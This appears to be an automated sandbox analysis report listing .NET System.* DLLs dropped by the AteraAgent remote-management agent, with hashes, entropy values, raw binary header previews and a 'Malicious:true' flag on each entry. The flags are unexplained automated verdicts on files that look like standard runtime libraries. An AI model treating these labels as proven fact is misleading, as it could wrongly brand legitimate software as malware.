                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................D(..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17960
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.67540834837691
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Vh06sbbVVPWU2WYNNyb8E9VF6IYijSJIVxeBJEG:Vy9gpEpYi60At
                                                                                                                                                                                                                                                                                              MD5:C6C2A4748A0358E5E117E5EA92A7A5CC
                                                                                                                                                                                                                                                                                              SHA1:AFA829A0B7CFEB8FE1B4113CA9D315618825A9CE
                                                                                                                                                                                                                                                                                              SHA-256:8C732D6FF6B7171E21E341EBB5DF403A0492F784D5865DFBC26BBAA7EB0C0165
                                                                                                                                                                                                                                                                                              SHA-512:64A8A0495B65A312B7F5228094BD74A3B647F2895C3BE4DF28B65FD1BE214DB85A097AD40FC73B95E622DA56A4EF301EB7BE91B17184FF8DDB1FE8AB1145C763
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ...............................U....@.................................@3..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.81362702616023
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:1na8WK1WLfNyb8E9VF6IYijSJIVxY4YvO/:1na0ojEpYi60SO/
                                                                                                                                                                                                                                                                                              MD5:1B83C23AD63079909D9249AF270CE723
                                                                                                                                                                                                                                                                                              SHA1:9B69A0EE1F1CB7D51B949F4FC4564309C2B69F6E
                                                                                                                                                                                                                                                                                              SHA-256:DCB0FD8AC602600500A66FF63C3EED2004AF2815AFEF44C17ED7FD56C7A64865
                                                                                                                                                                                                                                                                                              SHA-512:ED020CE93C9F8AFF9B482ABBC39D19FE33E9F1527729262CBA65C8BB7EBAB1FF3936D2970DACD3ECFAA3D70DFBBF01F4CFCF372D215FEF564CB058AC4C0EC9F4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............j*... ...@....... ...............................h....@..................................*..O....@..................((...`.......(............................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................L*......H.......P ......................`(......................................BSJB............v4.0.30319......l...@...#~......0...#Strings............#US.........#GUID....... ...#Blob......................3................................................w.................!...........<.....Y.............................................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Extensions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.763739326554534
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:/BSWITWWSNyb8E9VF6IYijSJIVx3mR6pE:/6LyEpYi60WR9
                                                                                                                                                                                                                                                                                              MD5:8701AC62E4798E316D261B8B610ABCED
                                                                                                                                                                                                                                                                                              SHA1:AEFC7E582FD623838E37117D3E1E4AF7A774F205
                                                                                                                                                                                                                                                                                              SHA-256:C6EE477A087AF68BCA366F0F1EB844AF1C1453E710DD5B63BBFFE0365DF59100
                                                                                                                                                                                                                                                                                              SHA-512:EAD5EEC7465E84D8335713AC824F1D99BC0DF721EBA845E0625933A8915CD24AED788FE3C4D17A03BBAAEAC790E5AF4D4B3D69E6202A791ADE2D87B5FD171632
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............*... ...@....... ..............................E.....@..................................)..O....@.. ...............((...`.......(............................................... ............... ..H............text...$.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................|.....|...S.i.........g.................f...........5.....~...........P.....9...................c.....c.....c...).c...1.c...9.c...A.c...I.c...Q.c...Y.c...a.c...i.c...q.c.......................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8758049902132425
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:R88cIIWNoWJiNyb8E9VF6IYijSJIVxJQqeNHPw:R9cU7iEpYi60VeNHo
                                                                                                                                                                                                                                                                                              MD5:673FC0EDF04D3C42EC568DA9B17C41FE
                                                                                                                                                                                                                                                                                              SHA1:E5E4BC30C22AD35A68A30EEBA3E99EA4BCF5CB3C
                                                                                                                                                                                                                                                                                              SHA-256:4AA394D3C7347439434D4839E8CEB3BEB2731D05DEF428FACDF3911BD701556F
                                                                                                                                                                                                                                                                                              SHA-512:EFA56562181FC801B21D4B33B0079020B6BA6D45194C9D5932F9856122CA6F8490D6D5CE48046BF3E48162125FF1998527B123189A11B2190A3FCEA00BD5398E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............V)... ...@....... ..............................M.....@..................................)..O....@..................((...`.......'............................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................8)......H.......P ......................L'......................................BSJB............v4.0.30319......l.......#~.. .......#Strings............#US.........#GUID...........#Blob......................3..................................................*.....*...c.....J.....w.................v.....,.....E.................`.....I...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22568
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.621496009544969
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:8kUwx9rm5go1fWKmmW4oqN5dWjaWbJNyb8E9VF6IYijSJIVxowXqgrVJ:rrmoFmWXX/NEpYi60b5
                                                                                                                                                                                                                                                                                              MD5:C8A35AFE897C901B54B621BE5527A672
                                                                                                                                                                                                                                                                                              SHA1:A63AC12893B791995A14818C806EE0F59570B267
                                                                                                                                                                                                                                                                                              SHA-256:329BC85D116D0E0C4AC79596A0128BA2504C6CC9AE519D649F5D0DC8BBE12DE3
                                                                                                                                                                                                                                                                                              SHA-512:72313DB7BE5CA2F90A38277AD5339AB3E9577763FE0721D90FA3D186A45E895F4C3B131A7244401E1E80F4A80C136F7EF30AB7D0BA224743BF874CD67AC3EA06
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..&...........E... ...`....... ..............................E.....@.................................PE..O....`..x............0..((...........D............................................... ............... ..H............text....%... ...&.................. ..`.rsrc...x....`.......(..............@..@.reloc..............................@..B.................E......H........$...............A.......C......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r/..p.(....*......(....*2(.....(....*^~....-.(.........~....*.0..........~..........(.........(....-Y..(!....{/......5..,

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):18472
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.672732671770867
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:E09bOAghbsDCyVnVc3p/i2fBVlAO/BRU+psbC984vmJHrE1dtx66aI2sU52RWVsc:lOAghbsDCyVnVc3p/i2fBVlAO/BRU+pu
                                                                                                                                                                                                                                                                                              MD5:312173D3BC4ED8D4C7F8767D11B1C6E6
                                                                                                                                                                                                                                                                                              SHA1:F145617D35C86FD11D4AC4D0AFAD5517A4989451
                                                                                                                                                                                                                                                                                              SHA-256:2919C102D0AB36CD0704AFD5EF642432EF297BC9EBB964FDCC171BF5B0CB7603
                                                                                                                                                                                                                                                                                              SHA-512:727302C6AF63D4FFC3810FF51863B244666DA14517474F175FD39E6CCE4907D13A7A88A95032753DA36508FFD88E25C11236BC22153107D39B2EE6EEA4DC050C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............r5... ...@....... ..............................`]....@................................. 5..O....@..P............ ..((...`.......3............................................... ............... ..H............text...x.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B................T5......H.......P ......................h3......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................r.....................e...........4.................3.....L...................................R...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.826444460589489
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cdYx4AW6RW5wPSNyby2sE9jBF6IYiYF85S35IVnxGUHFt7kRFElqD:r7W6RWmaNyb8E9VF6IYijSJIVxZ7Vu
                                                                                                                                                                                                                                                                                              MD5:7093C8CED5FD3EA657EC1F4FE62999B6
                                                                                                                                                                                                                                                                                              SHA1:8D631D42CD538B4E78E103E968F0E1EAE9A44E70
                                                                                                                                                                                                                                                                                              SHA-256:A58B4E32A90AFE5E787F28541DACEC904EDFCC475585858540B19C4188A3B485
                                                                                                                                                                                                                                                                                              SHA-512:4885195CC867B32C4EA4169FC96554D72FF86D73F9CC95FC2F6AA140709961A2737709FFB840ECA75FC0B3062A2BF4AF3B713239C70F28B6B42CFB963B0D7BFE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ...............................p....@.................................T(..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......4...#Strings....(.......#US.,.......#GUID...<.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.9210346623513805
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:fI5HeWFwTBsWWcNyb8E9VF6IYijSJIVxuKoen7dr:fI5HFwTBI8EpYi60l1r
                                                                                                                                                                                                                                                                                              MD5:599A888ADAA4F03F1137136175A19415
                                                                                                                                                                                                                                                                                              SHA1:1DABEFB8BAA30A1DF687DD1494B6D4223D782B55
                                                                                                                                                                                                                                                                                              SHA-256:42870B417A83F39319F33400D46998FA7D660D6D41E2D507474AD08815FE371E
                                                                                                                                                                                                                                                                                              SHA-512:85F5FF6ADA69B6E4D5CE9A9B5E423E92F028D214DC486D69576224906B6AED183A50586533FB6325079DA8BC6F8DBE82792FB2EE8DC1093E23CB6998165237CC
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................(.....@.................................|)..O....@..................((...`......D(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ..t....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....@.......#US.D.......#GUID...T... ...#Blob......................3............................................................U.x...........................~.....4.....M.................h.....$...................r.....r.....r...).r...1.r...9.r...A.r...I.r...Q.r...Y.r...a.r...i.r...q.r.......................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.890331489145955
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:PAJpVWbfkBnWRXNyb8E9VF6IYijSJIVxnly:PAJpWfkBAbEpYi60A
                                                                                                                                                                                                                                                                                              MD5:5212F5DA16B2E0BFB6F8A2296E33054A
                                                                                                                                                                                                                                                                                              SHA1:B0CF851E00F1AB11753C1FF0757DEE1396465C0C
                                                                                                                                                                                                                                                                                              SHA-256:8FC45810F324091F09DC4C409F3397FD592071837190083306E62CF4491AA79C
                                                                                                                                                                                                                                                                                              SHA-512:2980DF58B47366E637372EF57D4636B9B493FB5974961371853682429518274EEE710C059253925F307521D0BD55BED001C4CDAABB3F5DA2067E2A9F5E56B741
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............>)... ...@....... ...............................e....@..................................(..O....@..`...............((...`.......'............................................... ............... ..H............text...D.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................ )......H.......P ......................4'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...........@...\.@...0.-...`.....D.................C.................[.....x.....-.........................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.#...C.>...K.^...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):21032
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.541043818179056
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:C8R71h7yzt94dHWFgQBVWeHWFyTBVW2dNyb8E9VF6IYijSJIVxRNUr:/1dyAqgQBfqyTBZZEpYi60S
                                                                                                                                                                                                                                                                                              MD5:916F1422863E6E79BE296898E09AE41C
                                                                                                                                                                                                                                                                                              SHA1:0AF138ADB95956E52E636544F37968415B29AEA5
                                                                                                                                                                                                                                                                                              SHA-256:DBA7D8644C6D46E0EDCA62829C09767E20AC8A5E52AD178BB22ED952976A163C
                                                                                                                                                                                                                                                                                              SHA-512:955A43AF45D4262C938AC169EBFD457291DBF650B730D447B8E6DD5C2D88AD60D9891610932E7076103FFB068326C95BC04F475FA3EEB4C063FF500DF044C594
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............8... ...@....... ..............................G(....@..................................8..O....@..8............*..((...`.......7............................................... ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`.......(..............@..B.................8......H.......|!..l............1..p...X7......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*..BSJB............v4.0.30319......l.......#~..h.......#Strings....\...4...#US.........#GUID...........#Blob...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):18984
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.683466650805465
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:dpsBljcZQIVI8CNwbcyMWs4oBOW9MWG4tBOWb8Nyb8E9VF6IYijSJIVxZ8obo:bsPMQMI8COYyi4oBNw4tBrcEpYi60g
                                                                                                                                                                                                                                                                                              MD5:2C6D15F1DAC2EBF14D0FB2A2C7A4DDCB
                                                                                                                                                                                                                                                                                              SHA1:A18BB8F315D9321F8016D8E15BC04A6725465B2F
                                                                                                                                                                                                                                                                                              SHA-256:B8FFA01A630F1E0A342EC51036496F1585148BFDCC8FE0BB43E8B46A275A2607
                                                                                                                                                                                                                                                                                              SHA-512:98E2E2CC297812A8FC67B35F5F44C60125920F51C0370C89D17CC68FC7518B43D01EC4175BCAA0236056E2BA6D910239D70E902B3E55ED34DAC4840A0879BDE7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............3... ...@....... ....................................@..................................3..O....@..............."..((...`.......2............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................3......H........!..0...................L2.......................................s....*..s....*..0...........o....u......,..o....*.*.0..%........s..........(....r...p.$o......o....*:.(......}....*..{....*.(....z.(....z6.{.....o....*:.{......o....*.(....z:.{......o....*.(....z.(....z.BSJB............v4.0.30319......l.......#~.. .......#Strings....$...0...#US.T.......#GUID...d.......#Blob...........W..........3............................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):23592
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.318460763867933
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:mbhigwLAuZtM66g/Id7WVXWgvNyb8E9VF6IYijSJIVxdTtl:mbhzkKs9TEpYi601
                                                                                                                                                                                                                                                                                              MD5:3A3C8C03E8B6487E263D7B0F071D75DC
                                                                                                                                                                                                                                                                                              SHA1:F4AC78C21322BF8B8C2CAA36AC3C8483EACD23FC
                                                                                                                                                                                                                                                                                              SHA-256:B3C0425DB497A8963138CC1503336BE3BCD9EB617EE7CC22ECF60E2358A1A237
                                                                                                                                                                                                                                                                                              SHA-512:79A2A9AA6AC194B4CB5F4EA04F1F0C9169AF14151BCE54C8460A5A46366ED7F129E7383AAA41586EFEF6AFE36249A34A174D75B3A2678A2330DC93480231EC31
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..*.........."H... ...`....... ...............................J....@..................................G..O....`...............4..((...........F............................................... ............... ..H............text...((... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H.......P ...%...................F......................................BSJB............v4.0.30319......l.......#~..........#Strings.....#......#US..#......#GUID....#......#Blob......................3................................................_.........................8.....8...*.8.....8.....8.....8.....8.....8.........*.8.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.864288429882081
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:sUcX6W9aWTmNyb8E9VF6IYijSJIVx7y535XF:sUchXuEpYi60s
                                                                                                                                                                                                                                                                                              MD5:55D4283CB52E89F9815618E1FBBD05CC
                                                                                                                                                                                                                                                                                              SHA1:AF8C11AD75F0708F531EB8246E461BDFC0DEEBBC
                                                                                                                                                                                                                                                                                              SHA-256:B789D554F02DB5E29069EFB506B3E3D951A5E33CA630B85F12EC676593EDBBF4
                                                                                                                                                                                                                                                                                              SHA-512:C7FCCEE4550AEF7DEECBBAE03454EF8EB1B31CAE8EC33985E1BD71DCD25465F4A73D9920C728088C0EE0147A69D92E5A3073A3C52849A005F34E96094CDCB667
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............B)... ...@....... ...............................7....@..................................(..O....@..................((...`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....(.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41000
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.950245101846923
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:JoBj7kS+8mjvHTeaWKs0Sd4eeUAEpYi60k:UPmb9WKs0PeeUJ76x
                                                                                                                                                                                                                                                                                              MD5:7190AEEF4D2152208FE23AA15A83B47F
                                                                                                                                                                                                                                                                                              SHA1:D833E51CE40AD5F7A3DF04460B3C5EBB8E7903F0
                                                                                                                                                                                                                                                                                              SHA-256:BCC8367E48F9530990714BF647C8F79556F85EADAC98BDF8C29CC2FECD47C354
                                                                                                                                                                                                                                                                                              SHA-512:DECE7D9566EC2F46D00A59D14A7717D6BF6A80E51EB4EF38D059AC7A3DC0D0CC6D731EAA5F770199E76C22586E6F05D7A9E8F540234CEE73C318AEF62AA73090
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
